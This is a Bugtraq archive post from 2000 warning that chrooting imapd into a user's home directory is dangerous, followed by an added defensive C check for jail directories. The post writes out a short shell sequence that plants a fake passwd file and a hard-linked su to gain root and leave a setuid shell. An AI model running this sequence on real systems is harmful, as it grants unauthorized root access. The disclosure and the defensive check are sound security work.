Bugtraq
mailing list archives
Re: response to the bugtraq report of buffer overruns in imapd LIST command
From: elric () MABELODE IMRRYR ORG (R. C. Dowdeswell)
Date: Mon, 17 Apr 2000 23:02:48 -0700
On 956021099 seconds since the Beginning of the UNIX epoch
Mark Crispin wrote:
The final form of the CHROOT_SERVER code, which will be an option in the next
distributed version, consists of:
if (chroot (home ? home : ANONYMOUSHOME)) return NIL;
home = "/";
And, yes, this will do the necessary chdir().
chroot(2)'ing to a user's home directory is rather a bad idea in a lot of
setups. For example, assume that the machine has one large disk and one
partition. Then a decent number of unices would be vulnerable (on a
shell enabled machine) to:
$ cd
$ mkdir etc
$ ln /usr/bin/su
$ cp /bin/sh .
$ cat root::... > etc/passwd
imap in, get into a chroot(2) jail in your home dir, get a shell, su.
Then
# chmod 4755 sh
Using chroot in a lot of situations is rather dangerous, and one
must carefully set up the environment that it runs in.
IIRC, the default install of some unices/linuces is to have only one
partition.
== Roland Dowdeswell http://www.Imrryr.ORG/~elric/ ==
== The Unofficial NetBSD Web Pages http://www.Imrryr.ORG/NetBSD/ ==
== The NetBSD Project http://www.NetBSD.ORG/ ==
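
Added example, not part of the original post and not imapd's own code: a C check a server could run before calling chroot(2). It rejects a jail directory that the user owns or can write to, or that shares a filesystem with a directory of setuid binaries, which are the conditions the message above depends on. The names jail_policy, jail_check and the verdict enum are hypothetical.

```c
/* Added example: pre-chroot(2) sanity check for a jail directory. */
#ifndef _DEFAULT_SOURCE
#define _DEFAULT_SOURCE /* lstat() under strict -std= modes */
#endif
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>

enum jail_verdict {
    JAIL_OK = 0,
    JAIL_NOT_DIR,        /* not a real directory (e.g. a symlink) */
    JAIL_NOT_ROOT_OWNED, /* owner could plant etc/passwd, a shell, ... */
    JAIL_WRITABLE,       /* group/other can create files in the jail */
    JAIL_SAME_FS         /* hard links to setuid binaries are possible */
};

/* Pure policy check on stat results. `jail` is the intended chroot target;
 * `suid` is a directory known to hold setuid binaries (assumed by caller). */
enum jail_verdict jail_policy(const struct stat *jail, const struct stat *suid)
{
    if (!S_ISDIR(jail->st_mode))             return JAIL_NOT_DIR;
    if (jail->st_uid != 0)                   return JAIL_NOT_ROOT_OWNED;
    if (jail->st_mode & (S_IWGRP | S_IWOTH)) return JAIL_WRITABLE;
    if (jail->st_dev == suid->st_dev)        return JAIL_SAME_FS;
    return JAIL_OK;
}

/* Wrapper: returns a verdict, or -1 if either path cannot be examined.
 * lstat() is used on the jail so a symlink is not silently followed. */
int jail_check(const char *jail_path, const char *suid_dir)
{
    struct stat j, s;
    if (lstat(jail_path, &j) != 0 || stat(suid_dir, &s) != 0) return -1;
    return (int)jail_policy(&j, &s);
}

int main(int argc, char **argv)
{
    static const char *why[] = { "ok", "not a directory", "not owned by root",
        "group/other writable", "same filesystem as setuid directory" };
    if (argc != 3) { fprintf(stderr, "usage: %s JAIL SUID_DIR\n", argv[0]); return 2; }
    int v = jail_check(argv[1], argv[2]);
    if (v < 0) { perror("stat"); return 2; }
    printf("%s: %s\n", argv[1], why[v]);
    return v == JAIL_OK ? 0 : 1;
}
```

The same-filesystem test is deliberately strict: it also rejects a root-owned jail on a single-partition machine, since any user-writable subdirectory inside it could still receive hard links.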